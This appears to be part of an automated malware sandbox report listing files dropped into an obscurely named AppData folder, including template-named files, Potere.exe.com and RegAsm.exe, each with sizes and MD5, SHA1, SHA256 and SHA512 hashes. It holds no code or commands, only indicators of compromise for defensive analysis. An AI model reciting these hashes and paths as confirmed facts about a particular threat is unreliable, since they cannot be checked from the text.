Filesize1.0MB
MD56c1b9b74d09b572db467629a0e4d3eec
SHA1a38508ddc0d932690f416532ddbd32ee4375b164
SHA25670b96681d633c392bd6b2782128ee018bbe2eedb1ab565784db6016f1401f609
SHA5123515105e577255827e26b28bbcd79219bf5598809d526481b34dcb645bb54827d7680b2ee9cb82036cfefbc636211b66f73efc63a9a99e09cbb45ffbf5230b5c
-
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Facilita.xltx
Filesize1.9MB
MD5f07ba54d61e8ecd234cfc29dbd63c082
SHA12959ab5302060059db4c12af0ff9aa5c8d060499
SHA25617b8e05da75af68ae79999fb70d3031cbfc92ffaa6862e8b6bb6f9cee11a100a
SHA512b4ab41d0c0d26b79418a96a926217540e6c784fa87f6625416c39280245773ddf3c84c671fc5e1a9a79a628b12b79c09f34e4ca50fdded172b1add790c3f5864
-
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Mio.xltx
Filesize921KB
MD5a2a838e2b4d650fc8f8f59408183684a
SHA190c5b4ed3cb75b7ce6d3fb201d53bcb83fc812a1
SHA256ad7dc09b1a02ac60bc7fca76a294dfa5499af0ba7a840ff845c042cbac875e57
SHA512226dd3f5697759bed3926483966b0e71287526dd2308a460239e6cc215dce20a4bb06505969c30efbea5000c135bc2c3eb5b6b1bdb6a17b6cb748e9783336027
-
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Rimasta.xltx
Filesize138KB
MD56dfb1c72ba137b2aa256907636a86427
SHA1df8349a7e235ab63920ede1ba662628e2ec3b9e1
SHA256bd439ef1861dbad75461d95f2ced0e3a6ae9fd776b51fab9f5717444fd89d3ab
SHA5127298f2db3485a48de49645e7deeb1f413e16d3f4f01c96ddc1599be65465d66918c36b7f95db167b67bc03b2b60564dc9437da6aa798ac2a9842d88bfe4b01db
-
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Solitario.xltx
Filesize389KB
MD5d3394e00792e6cddadf23ad7e89629f6
SHA1e36e73c357ff01cb184fa477c0f2957a21bbac00
SHA25671d98c2ccab23a0bf3701d9e3758d40b152309f96d97d83388663f2985a67e04
SHA512ebd7107dddfa14eb73d3f36e124dd253ad4a7fe11a2b425205ad08a236061e614536622924a5b28bdf5212c10202d0b8b6f4d0040e9a6fba3391d0a1f244707b
-
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Viso.xltx
Filesize88KB
MD58fb8bc2a52e6514fcd7c481e3d2c5a19
SHA1b214c89d3960f7c67fe76a55839e6da7342c6b20
SHA256f7dc64367911ef5e81f3bfb586bb0ffa24e2d2fb19f845b2c1fba6c84ca6006e
SHA5124cc02e9a48decb29c927bc2bcc800576370db96573757e1164e6133641641d5edd10f7be01cf7cf7ee6840cfe445e9ab6debfdea60b623950abb2f8a1373fb37
-
Filesize
64KB
MD5fed49d376f98afa1119bcafada188074
SHA1fbe3f32e2024fa898d87afabb913695e1dd32457
SHA256a060a2667517ffa704a09dbc5c3a6ec34e4aff97063b93f168b72997c952c38e
SHA51246823890508d65ec19face21e796d80954a36d739d067685239ebb095fd0ddee946e96784cf2a266bf28448cd329f3e754876b899980230c6762f130e7b26b4d
-
Filesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
Filesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
Filesize921KB
MD578ba0653a340bac5ff152b21a83626cc
SHA1b12da9cb5d024555405040e65ad89d16ae749502
SHA25605d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7
SHA512efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317
-
\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
Filesize63KB
MD5b58b926c3574d28d5b7fdd2ca3ec30d5
SHA1d260c4ffd603a9cfc057fcb83d678b1cecdf86f9
SHA2566e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3
SHA512b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab